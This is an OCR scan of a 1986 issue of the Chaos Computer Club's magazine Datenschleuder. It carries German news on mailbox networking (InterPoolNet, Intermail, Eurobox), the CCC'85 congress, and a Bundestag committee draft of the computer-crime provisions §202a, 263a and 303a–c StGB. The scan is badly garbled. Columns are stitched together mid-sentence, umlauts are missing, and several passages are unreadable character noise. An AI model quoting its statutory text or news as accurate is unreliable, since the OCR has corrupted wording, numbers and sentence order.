Rckruf. Um weitere Miverstndnisse auszuschlieen, wurde ich direkt mit einer netten Dame vom Fernmeldeamt verbunden. Endlich wute jemand Bescheid. Ein kurzes Gesprch brachte den gewnschten Erfolg: am nchsten Tag lag ein Antragsformular bei mir im Briefkasten. So schnell funktioniert es (manchmal) bei der Post. Postwendend schickte ich das ausgefllte Formular zurck, auf Antwort warte ich allerdings noch immer. Zum Ganzen kann ich nur eins sagen: "Pattex-D: Ausloesung Anforderung durch Klebestelle"! Ich wnsche Euch mehr Erfolg, falls Ihr hnliches vorhaben solltet" schreibt MAGIC an die Redaktion. nuineu15.ws 860204 2000 magic

\ e

Die Wste lebt KURZMELDUNG Deutschlands Mailboxscene gert in Bewegung. Aus den ein- Datenschutz bei Bestellungen an den CCC zelnen Datenoosen in den Stdten und Drfern sollen sollen "Liebe Chaoten, ich mchte eure Datenschleuder abonnieren. blhende Informationsfelder fr alle werden. Notwendig ist da- Anbei ein V-Scheck ber 30,- D M und eine Studienbescheinibei 'n erster Linie, do die Betreiber der lokalen Systeme eine gung." heit es in einem Brief an die Redaktion. Mglichkeit haben, Informationen auszutauschen. Bereits auf Die beigefgte "Immatrikulationsbescheinigung" sieht aus wie den 7. Hessischen Computertagen in Neu-Isenburg bei Frankein Schwerer Kse. Unter der Namenszeile klafft dort, wo Gefurt im September letzten Jahres trafen sich die engagierten Syburtsdatum und -ort (19 Zeichen) standen, ein Loch. Auch achtsops einiger privater Bulletin Boards, um Erfahrungen auszustellige Matrikelnummer und das Semester der Erstimmatrikulatauschen und W e g e zur Zusammenarbeit zu finden. Es stellte tion sind suberlich ausgeschnitten. Beim "Fachsemester" sich dabei heraus, da es vorrangig wichtig ist, ein Informaschnitt der Absender ein zu Kleines Loch: es sind weniger ais 10. tionsmedium zur Verfgung zu haben, da es dem einzelnen DerStudiengang "Physikalische Technik" wurde nicht zum KseBetreiber ermglicht, preisgnstig Informationen on die andeloch. Der Abonnent wird deshalb als angehender Fachmann auf ren weiterzugeben. Konsequenterweise kann so etwas nur ber diesem Gebiet bei uns registriert" meint die Aboabteilung, Datex laufen; die Errichtung eines entsprechenden Systems postwel 5.ws 860226 0006 oder die Nutzung eines solchen ist also Voraussetzung fr so ein Projekt. Auf dem CCC'85 wurden diese Probleme dann konkreter angepackt, der Tag des Sysops brachte eine Reihe fruchtbarer Gesprche, an deren Ende der Plan stond, InterPoolNet zu grnden. Aufgabe dieses Vereins soll es sein, die Telekommunikation in freundschaftlicher und vlkerverstndigender Weise zu frdern. Im Klartext heit das, da jeder, der Informationen hat, diese einen groen Topf werfen kann, aus dem sich alle Vereinsmitglieder bedienen knnen. Auf diesem Wege wird den Sysops ein Instrument in die Hand gegeben, das dem O t t o Normaluser den Zugang zum Weltdatennetz beitet. Aktuelle Infromationen knnen so aus den entlegensten Teilen der Welt Perverse Staubsauger? direkt an den interessierten Benutzer eines lokalen Bulletin Beim Reinigungsversuch einer BIM-Kugelkopfschreibmaschine Boards gelangen.

Wir berichfen in einer spteren Ausgabe ber InfePoolNet, wenn der Verein die ersten technischen und rechtlichen Hrden genommen hat.
/xi/ws/interp15,ws gobiin 19860204 22051

mit einem Staubsauger wurde das Farbband mit derariger Wucht ausgefdelt und eingesaugt, da ein Herausziehen desselben nach dem Ausschalten nicht mehr mglich war und das Farbband durchgeschnitten werden mute, damit die eingesaugten Meter im Staubbeutel verschwinden konnten.
itaubiau.wsB&Otll&tl w a u

Datensch1euder 15 = Mars 1986 Das wissenschaftliche Fachblatt Fr Datenreisende Ein Organ des Chaos Computer Clubs

C9927F

Datemchleuder - Sonderausgabe CHAOS


Das

COMMUNICATION
HAI-BURG F a c h b l a t t

CONGRESS 85
27.12.-23.T2.B5 BTX 32043204/655322

EIDELSTHDTER BRGERHAUS

^ i t t
'9
o ' e n CCC-lntern, HAMBURG. Als Nachwehe des Chaos Comunication Congresses im Dezember letzten Jahres landete ein Teil des CCC-Archives im nchsten Papiermllcontainer. Durch rasche Hilfe kommunaler Mllmenschen konnte der Schaden begrenzt werden. Die Handbcher zur Polizeiverwendung wurden wiedergefunden. Derzeit wird das Material aufgebgelt. SCHECKKARTEN KLN - "Zwei Klner haben durch Manipulationen an Geldautomaten einen Schaden von 80.000.- D M verursacht. Der fr den technischen Teil verantwortlich" bezeichnete sich in der Vernehmung als .Computer-Freak". Er habe die Arbeit am Heimcomputer als Hobby betrieben. Zu den Experimenten mit Scheckkarten sei er durch eine Fernsehsendung angeregt worden." So die Pressestfelle der Polizei in Kln am 29.1.8(5. Auch beim CCC in Homburg laufen Anfragen von durch Manipulationen betroffenen sowie von wissenschaftlich Arbeitenden zu diesem Themenbereich auf. Ein Beitrag ber Technik und gesetzliche Grundlagen ist fr die HABI Teil 2 vorgesehen (next year). AKTIVITTEN Fr Datenschleuder 16 ist eine Obersicht von Adressen, Gruppen und Treffen Datenreisender geplont. Alle Gruppen seien gebeten, eine kurze Selbstdarsfellung ber ihre Anliegen, Konlaktodresse und elektronische Anschrift an die Leitstelle 1188 einzusenden. POST B O N N Das Referat 2640 des Bundespostministeriums stellte zum November 85 den Entwurf zur Telekommunikationsordnung (TKOJ vor. Wichtigste Neuerung ist die Unterscheidung zwischen .Anschlu" (die Dose von der Post) und .Endstelle" (Akustilckoppler, M o d e m oder Telefon!}, wobei die Endstelle auch feilnehmereigen sein kann. Die Endstelle (Telefonapparat) oder Teile (Gebhrenzhler) davon sollen zuknftig keine formalen Bestandteile des Anschlusses sein. Der Anschlu wird danach unterschieden, ob er eine einfache Endstelle" oder aber fr eine .Anlage", die Vermittlungs-, Verteil-, oder Konzentratorfunktionen bernimmt (Mailbox?], bestimmt ist. Danach, und nach den in Anspruch genommenen Vermittlungs- u. o. Verteildienstleistungen z. B. Bildschirmtext, Teletex oder ISDN sollen die Gebhren berechnet werden. W e r seine HARDWARE nicht von der Post bezieht, spart. W i e bisher sollen private Endeinrichtungen (Datenklos, Modemkarten), die eine Teilnahme am ffentlichen Telekommunikationsdiensten ermglicht, zugelassen sein. Zustndig ist weiterhin das ZZF, das eine .Benutzungserlaubnis" erteilt. Die DBP will jedoch fr eine Reihe von Endstelleneinrichtungen Ausnahmen zulassen. Eine .Verwaltungsanweisung" regelt nheres. Es ist z. B. sich das Recht auf Abschaltung bei Mngeln vor. Die TKO soll 1988 die Rechtsgrundlage fr eine lngst berfllige Liberalisierung im Fernmeldewesen schaffen. Die geplanten nderungen sollten aber nicht davon ablenken, da in diesen Tagen immer r o c h M a i l b o x b e t r e i b e r , die mit ungeprftem Gert arbeiten, Besuch vom G i l b erhalten. Dieses als kurzer Abri, mehr spter! LS23 Steffi 15.ws 860323 01

w i s s e n s c h a f t l i c h e

I er! h>r

Kleine Fische Intermail Vernetzung der lokalen Systeme Zukunftsorientierte Datenkommunikation betreiben bedeutet heute, an der Schwelle zum Informatronszeitafter, da die Vernetzung der bestehenden Systeme vorangetrieben werden muss. Umfassende Information setzt umfassende Vernetzung der verschiedensten Informationsysteme voraus. Bislang waren die sogenannten Low-Cost-Systeme, also von privat betriebene Mailboxen auf Home- und Personalcomputern von dieser Entwicklung ausgeschlossen. Das sofl sich schon in nchster Zukunft ndern, um auch dem ' O t t o Normaluser 1 die vernetzte Welt der Daten erschlieen. Bereits seit einiger Zeit existiert in Hamburg eine lose Gruppierung von Betreibern privater Low-Cost-Boxen, die unter dem Namen BulJeh'nboard Service Hamburg versucht, Ordnung ins Chaos zu bringen und durch gemeinsame Anstrengungen der Sysops Schritte in dieser Richtung zu machen. Auf dem CCC85 wurde erttmols ein Vorschlag 2ur Vernetzung der lokalen Systeme mit dem Arbeitstitel 'Intermail' vorgestellt. Es handelt sich hierbei um ein Konzept, das innerholb der kommerziellen Mailboxsysteme bereits realisiert ist und dort zu den Standarddienstleistungen gehrt. Intermail erlaubt das Versenden persnlicher Nachrichten an andere User, ohne da diese zwangslufig in allen lokalen Boxen vertreten sein men. Es gengt vllig, in einer Mailbox als Benutzer eingetragen zu sein, um von jedem anderen User der anderen Boxen angeschrieben werden zu knnen. Der Vorteil liegt auf der Hand. Wer bisher als engagierter Nutzer der lokalen Systeme gezwungen war, mehr oder weniger regelmig in allen Boxen vertreten zu sein, kann sich nunmehr darauf beschrnken, die fr ihn persnlich wichtigsten onzurufen. Technisch realisiert wird intermail durch einen eigenstndigen Rechner, Intermailcontroller oder kurz IMC genannt. Dieser fragt regelmig zu festgelegten Zeiten die lokalen Systeme auf vorhanden Intermail ab, verarbeitet diese und verteilt sie wieder. Natrlich kostet so etwas Geld, in einem regionalen Netzwerk mit zehn Mailboxen follen bei tglichem Update durch den IMC rund 130.- D M pro Monat an, selbst wenn keine Nachricht verarbeitet werden mu. Daraus folgt zwangslufig der Schlu, da Intermail nur dann sinnvoll ist, wenn ausreichend zahlende User daran teilnehmen. Nach Schtzungen der Homburger Arbeitsgruppe funktioniert Intermail kostendeckend, wenn rund dreiig User mit monatlichen Beitrgen von vier bis fnf D M dabei sind. In der Praxis sieht die ganze Geschichte nun so ous, do das Konzept Intermail bereits weitgehend realisiert ist. Die ersten Probelufe sind abgeschlossen und bis sptestens Mitte Feb r u a r w i r d Intermail in Hamburg als Dienstleistung fr die Nutzer der privaten Systeme zur Verfgung stehen. Selbstverstndlich wird das Intermail-System allen interessierten Betreibern zugnglich gemacht werden. Ansprechpartner hierfr ist der BBSH, zu erreichen ber die CUNCH-Box Hamburg. i n t e r m l 5 861306 2035 gobiin

Frher u t r Air Tanz Ttusdrtck kEver Kownui ni ikatioat ein O H dar KoatakhulaaFiaat Uber 91ografuche G reize hinweg. Jetzt hat der CCC ine* Bodta btrciiti,auf den titli zur Jahreswende Sjiopt, Dafeweisder Phrtakt und dert Kommumkafumsbegebterte Ui Eidcbtdier Bikgerhaus zum Tanz auffordern knnen. Di Motto: D u d a r b t Die Message: Benutzt die Heuen Medien! W r wollen den weder durch Preis-noch durch Zensurschranken jehtnderten Flu der Informationen. W r wollen Datenbanken. |efuHl mit relevanter Information. Wir wollen Knotenpunkte einrichten; vorhandene untersttzen und untereinander vernetzen. Ein Marktplatz der freien Information mit Anschlu an die Well. Herrschende Institutionen haben sich nichl auf die neuen Medien jestrzt, um den freien Informationsaustausch zu fordern, sondern um diese Medien zu kommerzialisieren und ihren Interessen dienstbar zu machen. Wir haben andere Interessen.

Der Congress tanzt

Dia geplante Nov* Hier ung dar Gesetze ber die U HschafkriminaKt und die Angst des Establishment vor mndigen - rieh informierten Brgern traien auch nicht dazu bei, einen wirklich freien Informationsaustausch zu armfHchen. Aber nichl genug, schlichtes Unwitsen, die oft unntig komplizierte Bedienung der technischen Einrichtungen und eine diffuse Angst vor dem Jobkiller Computer machen Aufklrungsarbeit ntig, Davor hat der Groe Susop elriije Stolpersteini Hier bittet der Congress zum Tanz. Mir wollen elejt, in Form der POST und der etablierten voneinander lernen, nicht nur den Umgang mit InformaUonswirUchaft, die eiferschtig ihr der Technik, sondern auch mit uns. Wir knnen Pfrnde bewachen. lernen, Schwellenngste zu berwinden und die bestehenden Einrichtung en zur Verbreitung uliehe mm t er Information zu nutzen, connz.ws8S1228 230S

Seite 5

atcnci)lcubcr
15 = H a r z , 1986
fr Datenreisende Club Chaos Computer

eite 7

H k i t l m l a m u j i M i l i h Iii i u C c H t u r eliade " H i l k i k w Z O K * . D a k des H c b l I lekktort stie d u ich uf das Veritadab m Z i W p c f e j s k v d i c Lhr Dirwtwaffc Im Rufe SrUnter ttarken Sicherheiliuorkehninf en..." Und in der Zeitunf. Diel JaJir wurJe ein neuer, hochstempfindlicher Detektor in tchwarzes Platt, krohr vertchiedener D u r e K r n e n e r (GummiknuspelahnlicJi) einfebaut und mit roten Leuchtkkbei I r c i f e n verziert. Er l i e h t absolut j e f a h r l k h aus und pieptfurchterbch. M aximalemphndhchVeil: 1 Schraube. Er findet auch alle mjlichen anderen Gerate, die tum Diebstahl persnlicher Daten dienen knnte. Da bichen Elektronik uxd die Batterien tind in ein Handfunkierat m m Umhngen ekvjebaut. U ichtife E r j a t u u n j ist die Fenitprechuerbindunf tur unsichtbaren EinsaUleiUin. Dat G a m e 1 die Chaos-tf mifiuloritiUtmheH und macht aut jedem, der tie t r i j t , eilt hchst tbdnicktwoQe K.ontroDperon. D i e * manchem etwas merkwrdig anmutenden Uorkekninien farantieren unt immerhin e i n e n einijermaen unbehe&iften Aufenthalt in der freien Republik Eidelstedt, deren Grenzen bis Sonnta] Hbead (eilen und die Selhstuerv attunj in Sicherheitsinieu erfordert, um prfessionelle "Sckitzer* beniifl o> Auw Aufjabe freistellen i a kemkea. Dazu ickrlauck dat Sicherheitssystem im K atattrof beufalL U a fatalen Folien eines tolchen Falles worzukeujen, Wirde die kommunikatioratechnische Infrastruktur nach bestem BehrdenKisten mit dereti UkUrtttzunj aufgebaut und erjanzt d i r c h i rauhen Hacktralllai bewahrte Gerte D a i eordnete Uerkae der Rume im Gefahrenfall wird v o n Chaos-Dienst untersttzt und durch Lautsprecherdurchtajeri (esteueri. Der Code s t akaiieh dem in Grokaufhusern fevhJt ved noch haJbfeheim. Die D v r c h m e ' K a m nach M m kau" bewirkt durch die Aktivierunt unbewtter DenkinbaHe dat Freimachen des Eiran|ibcreich) samt K a u e fr den geordneten Auszug. repuiKi.ws 8S1228 I S r f i e

Freie (?) Republik E i d e l i f e d t

Wissenschaftliches

Fachhl.itc

Eurobox
ist e i n e l e k t i s c h e s C a f e - H a u s z w i s c h e n D u b l i n u n d A t h e n . D i e E u r u b o x startet a m 1.1.86 u n d w i r d v o n M i t L e d e r n der E u r o - G r n e n betrieben. In der E u r o b o x ollen euerseits uertchiedrn e I n f o r m a t i o n s d i e n s t e d e r E G u n d de$ E u r o p a parlaments v t r f f b a r e m a c h t werden, anderer e i t s o l l sie d i e U m i e b u m f r t i j e n r I n f o r m a t i o n s d i e n s t e b i e t e n . U n d i c n l i e a h c h w i r d l i e sich hoffentlich auf die D a u e r t u einem N e U von I n t e r n i e r t e n ausweiten, die direkt lnfo's zu verschiedenen T h e m e n auslauschen. E t r o b o x wird d e m n i c h i l a h getrennte) M en innerhalb der C O M B O X ericheinen. Themen v o n B r e t t e r n k n n t e n ein: - Aktuelle! im - Frauenrechte EP

Herausgegeben Deutscher Dundestag - - 1 0 . Wahlperiode B e s c h l s s e des . A u s s c h u s s e s 2c. 202 Abs. 3 erhSlt folgende Fassung:

vom

Drucksache 10/5058
(2) Der Versuch ist strafbar. (3) 267 Abs. 3 ist anzuwenden. 270 Tusehung im Rechtsverkehr bei Datenverarbeitung Der Tauschung im Rechtsverkehr steht die flschliche Beeinflussung einer Datenverarbeitung im Rechtsverkehr gleich." 7. In 271 Abs. 1 werden nach dem Wort ..Dchern" ein Beistrich urid das Wort Dateien" sowie mich dem Wurt beurkundet" die Worte ..oder gespeichert" eingefgt. fl. In 273 werden nach dem Wort Meurkundur.g" die Worte oder Datenspeicherung" eingefgt. $ 274 Abs. 1 wird wie folgt gendert: noch N u m m e r 1 wird folgende N u m m e r 2 eingefgt: ..2. beweiserhebliche Daten (202a Abs.2), ber die er nicht oder nicht ausschlielich verfgen darf, in der Absicht, einem an-' deren Nachteil zuzufgen, lscht, unterdrckt, u n b r a u c h b a r macht oder verndert oder"; 303 a Datenvernderung (1) Wer rechtswidrig Daten (202a Abs.2) lscht, unterdrckt, u n b r a u c h b a r macht oder verndert, wird mit Freiheitsstrafe his zu zwei J a h r e n oder mit Geldstrafe bestraft. (2) Der Versuch ist strafbar.

M(3) E i n e m Schriftstck im Sinne der Absfitze 1 u n d 2 steht eine A b b i l d u n g gleich." 2d. Nach 202 wird folgende Vorschrift eingefgt: ,. 202 a Ausspfihen von Daten (1) Wer unbefugt Daten, die nicht lr ihn bestimmt u n d die gegen unberechtigten Zugang besonders gesichert sind, sich oder einem anderen verschafft, wird mit Freiheilsstrafe bis zu drei J a h r e n oder mit Geldstrafe bestraft. (2) Daten im Sinne des Absatzes 1 sind nur solche, die elektronisch, magnetisch oder sonst nicht u n m i t t e l b a r w n h r n f h m h a r gespeichert sind oder bermittelt werden." 2e. In g 205 Abs. 2 Satz 1 wird der P u n k t durch einen S t r i c h p u n k t ersetzt u n d folgender Halbsatz angefgt: dies gill nicht in den FSIlen des 202 a." 3, Nach 2G3 wird folgende Vorschrift eingefgt: .. 263 a C o m p u torbetrug (1) Wer in der Absicht, sich oder einem Dritten einen rechtswidrigen Verrngensvorteil zu verschaffen, das Vermgen eines anderen dadurch beschdigt, da er das Ergebnis eines Datenverarbeihjngsvorgangs durch unrichtige Gestaltung des P r o g r a m m s , durch Verwendung unrichtiger oder unvollstndiger Daten, durch unbefugte V e r w e n d u n g von Daten oder sonst d u r c h unbefugte E i n w i r k u n g auf den Ablauf beeinflut. wird mit Freiheitsstrafe bis zu fnf J a h r e n oder mit Geldstrafe bestraft. (2) 263 Abs. 2 bis 5 gilt entsprechend." 266 b

- Dritte W elt - Landw irtschafi


- Umweltschutz - G e n / B io-Technolojie - Chemie und Gift - E m i j r a n t e n , Asylanten, Jobber - N e u e T e c h n o l o f ien - A c t i o n in E u r o p e

- US-Euro-Links - W ho ii w ho and where


E u r o b o x ist t e c h n i s c h g e s e h e n e i n e C l o s c d - U s e r G r o u p . Ausser den unvermeidlichen G e b h r e n an

Port und Com box darin keine finanziellen Interessen verwirklicht werden. Interessenten wenden zieh an Se*idLkl Hrlii
in der B o x Im Mehrinfhof Gneisenaustr. 2 1 0 0 0 B e r l i n 1 T e L 030/1532 2 2 2 2 e u r o b o x . w s 8 5 1 2 2 8 0S:DQe

'S c &

303b Computersabotage (1) Wer eine Datenverarbeitung, die fr einen fremden Betrieb, ein fremdes U n t e r n e h m e n oder eine Behrde von wesentlicher Bedeutung ist, dadurch strt, da er 1. eine Tat nach g 303 a Abs. 1 begeht oder 2. eine Datenverarbeitungsanlage oder einen Datentrger zerstrt, beschdigt, unbrauchbar macht, beseitigt oder verndert, wird mit Freiheitsstrafe bis zu fnf J a h r e n oder mit Geldstrafe bestraft. (2) Der Versuch ist strafbar.

Heie D a t e n , khle Doppler


D i e K o n y r w r - B O H , d e r e n N u m m e r in allen H a r n bunter Boxen H e f t erhieh 2m S a m i t a j von 7 h H U h r ca. 20 A n r u f e . Leider i i t kein Protokoll werhijbar, d a die Box m frhen S a m i U fliend hiH i b i t i r r t e u n d der y e u m l e finj. Die SyjOp'i Dbketieninin verbren vertchUn,

M i b r a u c h von Scheck- und Kreditkarten (1) Wer die I h m durch die berlassung einer Scheckkarte oder einer Kreditkarte eingerumte Mglichkeit, den Aussteller zu einer Z a h l u n g zu veranlassen, miObraucht u n d diesen d a d u r c h schdigt, wird mit Freiheitsstrafe bis zu drei J a h r e n oder mit Geldstrafe bestraft. (2) 248 a gilt entsprechend." .. 269 Flschung beweiserheblicher Daten (1) Wer z u r Tuschung im Rechtsverkehr beweiserhebliche Daten so speichert oder verndert. da bei ihrer W a h r n e h m u n g eine unechte oder verflschte U r k u n d e vorliegen wrde, oder derart gespeicherte oder vernderte Daten gebraucht, wird mit Freiheitsstrafe bis zu fnf J a h r e n oder m i t Geldstrafe bestraft.

UMFRAGE:
iOX der Befragten wollten "Kontakte anknpfen, SDK "Neues fiber D F erfahren", ein Drittel 'aeue Software bekommen*. Einer der Befristen rferte als Grund fr eine Anreise, ar * n a ] U A U pertalicb kaniienlamtn . Drei Vierte] der Teilnehmer kamen N I C H T aus d e n Groraum Hamburg, ondern waren I.B. aut K i r h i h e , K e i n oder Bremen injertirf.

N a c h t s c h i c h t , die Box w i w e r

hochiufaiiren.

fiufirund der UbertrajuniJprobieme ; bedinfl durch lautes Hinterf rundfelchter. wunde von den anwesenden Experten uihrend desK onirests eine neue Technolojie cniwid^clt der Kopo fer ilehl nun hfl lieft im KNsthrtik.

303 c Strafantrag In d e n Fllen der 303 bis 303 b wird die Tat n u r auf A n l r a g verfolgt, es sei denn, da/} die Strafverfo/gungsbehrde wegen des besonderen ffentlichen Interesses an der Strafverfolgung ein Einschrehen von Amts wegen fr geboten hlih."

,mkif *H$SS122801:lU

Sei

t e

3>atcntfjleui>ct
15 = Mrz 1986
vom Chaos Wissenschaftliches Herausgegeben Fachblatt fr Datenreisende Club Computer Z u Artikel 1 Nr. 2 c u n d 2 d 2 0 2 A b s . 3; 202 a StGB 1. Der A u s s c h u s c h l g t d i e A u f n a h m e eines i n den E n t w r f e n nicht e n t h a l t e n e n T a t b e s t a n d e s gegen das A u s s p h e n v o n D a t e n " vor, d e r das unbefugte V e r s c h a f f e n von b e s o n d e r s gesicherten, n i c h t f r d e n Tter b e s t i m m t e n , n i c h t unmittelbar w a h r n e h m b a r e n D a t e n u n t e r S t r a f e s t e l l t Als D a t e n dargestellte I n f o r m a t i o n e n sollen dam i t i n u m f a s s e n d e r Weise s t r a f r e c h t l i c h gegen S p i o n a g e geschtzt w e r d e n , als dies n a c h geltend e m R e c h t mglich i s t Der g e s t i e g e n e n Bedeut u n g des Wertes v o n I n f o r m a t i o n e n w i r d d a m i t strafrechtlich R e c h n u n g getragen. D i e in den E n t w r f e n vorgeschlagenen T a t b e s t n d e zur Computerkriminalitt werden dadurch in einem w i c h t i g e n Bereich e r g n z t a) A u s g a n g s p u n k t w a r e n i n d e r f f e n t l i c h e n Anhrung erhobene Forderungen, strafrechtlich das u n b e f u g t e A b h r e n u n d A n z a p f e n von D a t e n b e r t r a g u n g s s y s t e m e n " b z w . d e n unbefugten Zugriff auf fremde Datenbanksysteme" (Sieber, P r o t Nr. 26 S. 177; A n i . S. 267 f.) u n t e r S t r a f e z u stellen bzw. b e r l e g u n g e n , e i n e n verstrkten strafrechtlichen Schutz gegen C o m p u t e r s p i o n a g e u n d d a s u n b e f u g t e Eind r i n g e n in D a t e n v e r a r b e i t u n g s s y s t e m e (eins c h l i e l i c h des u n b e f u g t e n H e r s t e l l e n s u n d G e b r a u c h e n s v o n S y s t e m e n , die d e r berwind u n g v o n S i c h e r u n g s a n l a g e n d i e n e n ) (Oertel (Nixdorf. Computer AG). P r o t S. I 8 2 f , Ani. S. 3Sff.|. z u schaffen. N a c h Sieber stellt das . A b h r e n " von Datenbertragungsleitungen e i n e n d e r w i c h t i g s t e n A n s a t z p u n k t e der Comp u t e r s p i o n a g e i m B e r e i c h d a t e n f e r n verarbeit e n d e r S y s t e m e d a r . E s biete w e i t grere M g l i c h k e i t e n a l s d a s A b h r e n v o n Telefong e s p r c h e n , d a d i g i t a l b e r t r a g e n e Informat i o n e n m i t H i l f e v o n C o m p u t e r n s e h r viel l e i c h t e r m a s c h i n e l l a n a l y s i e r t w e r d e n knnt e n als d i e s b e i m g e s p r o c h e n e n W o r t m i t Hilfe v o n S p r a c h e r k e n n u n g s g e r t e n d e r F a l l sei. b) D a s g e l t e n d e R e c h t g e w h r t D a t e n n u r i n Teilbereichen einen strafrechtlichen Schutz gegen Spionage. 41 Bundesdatenschutzgesetz b e z i e h t s i c h n u r a u f p e r s o n e n b e z o g e n e D a t e n natrlicher Personen, 201 S t G B auf d i e A u f n a h m e b z w . d a s A b h r e n d e s nichtff e n t l i c h g e s p r o c h e n e n Wortes, w o b e i streitig ist, o b a u c h d e r Z u g r i f f a u f b e r e i t s gefertigte A u f n a h m e n erfat wird. 202 Abs. 3 S t G B z i e h t In d e n S c h u t z b e r e i c h d e s T a t b e s t a n d e s d e r V e r l e t z u n g d e s B r i e f g e h e i m n i s s e s a u c h ein e n a n d e r e n z u r G e d a n k e n b e r m i t t l u n g bes t i m m t e n T r g e r " m i t ein. D a m i t werden uns t r e i t i g F l l e e r f a t , in d e n e n z.B, i n e i n e m T r e s o r a u f b e w a h r t e C o m p u t e r d a t e n a u f ein e m M a g n e t b a n d n a c h f f n u n g zur K e n n t n i s g e n o m m e n w e r d e n . D a 2 0 2 Abs. 3 S t G B a u f d e n S c h u t z fixierter menschlicher G e d a n k e n b e s c h r n k t , ist d i e s e R e g e l u n g n i c h t anwendbar, w e n n Daten i m ubermittlungsstadium abgefangen werden.

>atcnd)leui>cr
2. I m einzelnen ist folgendes zu b e m e r k e n :

15 = Mrz 1986
Wissenschaftliches Herausgegeben Fachblatt Chaos fr Datenreisende Club vom Computer

Absatz 1
S t r a f b a r m a c h t sich, wer n i c h t fr i h n b e s t i m m t e u n d gegen u n b e r e c h t i g t e n Z u g a n g besonders gesicherte D a t e n i.S. des Absatzes 2 sich oder ein e m anderen v e r s c h a f f t G e s c h t z t w e r d e n d a m i t nicht alle D a t e n vor A u s s p h u n g , s o n d e r n n u r diejenigen, d i e besonders gesichert sind", d.h. solche, bei d e n e n der V e r f g u n g s b e r e c h t i g t e durch seine S i c h e r u n g sein Interesse a n der Geh e i m h a l t u n g " d o k u m e n t i e r t Die g e s c h t z t e n Daten b r a u c h e n deswegen allerdings k e i n e Geh e i m n i s s e " i.S. der verschiedenen Straftatbestnde z u m S c h u t z e von G e h e i m n i s s e n darzustellen. Z u r A u s l e g u n g des Begriffs besonders gesichert" k a n n a u f die R e g e l u n g in 202 A b s . 2 S t G B (vgl. auch 243 Abs. 1 Nr. 2 S t G B ) zurckgegriffen w e r d e n . Z u r V e r m e i d u n g etwaiger S t r a f b a r k e i t s l c k e n setzt der Tatbestand, insofern weitergehend als 202 S t G B , n i c h t voraus, d a der Tter v o m I n h a l t der D a t e n K e n n t n i s n i m m t (vgl. 96 S t G B u n d die N e u f a s s u n g von 17 Abs. 2 Nr. 1 U W G des E n t w u r f s : der Tatbes t a n d lt a u c h gengen, w e n n der Tter e i n e m a n d e r e n d i e D a t e n v e r s c h a f f t W a r e n die beschafften D a t e n f r d e n Tter (zu seiner Kenntn i s n a h m e ) b e s t i m m t , so entfllt wie bei 202 S t G B bereits die T a t b e s t a n d s m i g k e i t . E i n e solche B e s t i m m u n g ist allerdings noch nicht d a r i n z u sehen, d a d e r A b r u f von z . B . entgeltlich zu e r h a l t e n d e n D a t e n n a c h o r d n u n g s g e m e m Anschlu an eine Datenbank allgemein mglich ist; der A n w e n d u n g des 2 0 2 a S t G B e n t g e h t der Tter n i c h t , w e n n er z.B. die D a t e n o h n e e i n e n solchen A n s c h l u u n b e f u g t a b r u f t W a r e n die ein e m anderen verschafften Daten f r diesen bes t i m m t so k a n n die S t r a f b a r k e i t wegen m u t m a licher E i n w i l l i g u n g entfallen. D i e Tal ist n a c h 205 Abs. I A n t r a g s d e l i k t . Diese A u s g e s t a l t u n g stellt, n e b e n der A n w e n d u n g der 153, 153a S t P O , 47 J G G , einen w i c h t i g e n Filter z u r V e r h i n d e r u n g von u n n t i g e n S t r a f v e r f a h r e n d a r , z.B. w e n n d i e S c h u l d gering ist u n d eine materielle R e c h t s g u t b e e i n t r c h t i g u n g nicht vorliegt

c) D i e L c k e n h a f t i g k e i t des geltenden Rechts v e r a n l a t d e n A u s s c h u , einen n e u e n Tatbes t a n d v o r z u s c h l a g e n , statt sich m i t einer bloen E r g n z u n g v o r h a n d e n e r R e g e l u n g e n wie e t w a d i e des 202 Abs. 3 S t G B z u begngen. D i e S t r u k t u r des 202 S t G B bleibt d a d u r c h u n a n g e t a s t e t . D e r A u s s c h u legt allerdings W e r t d a r a u f , gespeicherte u n d i m bermittl u n g s s t a d i u m b e f i n d l i c h e D a t e n gleich zu beh a n d e l n . D i e b i s h e r durch 202 A b s . 3 i.V.m. A b s . 1, 2 S t G B g e s c h t z t e n D a t e n fallen d a h e r k n f t i g u n t e r d e n S c h u t z b e r e i c h des n e u e n 202 a S t G B . W e g e n d e s e n g e n Z u s a m m e n h a n g s m i t den 201,202 S t G B s c h l g t der A u s s c h u vor. den T a t b e s t a n d i n A n s c h l u a n diese R e g e l u n g e n i n d e n F n f z e h n t e n A b s c h n i t t des Strafgesetzb u c h e s e i n z u s t e l l e n , o b w o h l die S t r a f t a t nicht e i n e V e r l e t z u n g des p e r s n l i c h e n Lebensoder Geheimbereichs voraussetzt d) D e r A u s s c h u h a t d a v o n abgesehen, wie zun c h s t v o n der B u n d e s r e g i e r u n g a n g e r e g t s c h o n d e n blo u n b e f u g t e n Z u g a n g zu besonders gesicherten D a t e n u n d den Versuch einer S t r a f t a t n a c h 202 a A b s . 1 S t G B u n t e r Strafe zu stellen. Der G e f a h r e i n e r berkriminalisier u n g von V e r h a l t e n s w e i s e n soll d a m i t vorgeb e u g t werden. D a s S t r a f r e c h t sollte erst dort eingreifen, w o ein S c h a d e n oder wenigstens e i n e R e c h t s g u t s b e e i n t r c h t i g u n g , wie z.B. die V e r l e t z u n g d e s V e r f u g u n g s rechts b e r Inform a t i o n e n bei e i n e r T a t n a c h 202 a S t G B , eingetreten i s t I n s b e s o n d e r e sollen sog. Hakker", die sich m i t d e m b l o e n E i n d r i n p e n z.B. i n e i n C o m p u t e r s y s t e m b e g n g e n , also sich k e i n e D a t e n u n b e f u g t v e r s c h a f f e n , von Strafe v e r s c h o n t b l e i b e n . W a s d i e Versuchsstrafbarkeit b e t r i f f t ist d a r a u f z u verweisen, d a dieser b i s h e r in 202 S t G B u n d 41 B D S G auch n i c h t m i t S t r a f e b e d r o h t i s t S o w e i t es sich bei d e m u n b e f u g t e n E i n d r i n g e n u m ein Vorstad i u m zur B e g e h u n g v o n b e s t i m m t e n Computerstraftaten, sei es n a c h 2 0 2 a Abs. 1, nach 283, n a c h 2 6 9 o d e r n a c h 3 0 3 a S t G B hand e l t b e s t e h e n a u s a l l g e m e i n strafrechtlichen E r w g u n g e n B e d e n k e n , Vorbereitungshandl u n g e n z u solchen S t r a f t a t e n , d i e als V e r g e h e n e i n g e s t u f t w e r d e n , schon als solche m i t Strafe z u b e d r o h e n . F r e i n e K r i m i n a l i s i e r u n g ist zwar d a r a u f hingewiesen worden, da m i t d e m e r f o l g r e i c h e n E i n d r i n g e n in fremde Dat e n b a n k e n I n t e g r i t t s i n t e r e s s e n von Betreib e r n u n d B e n u t z 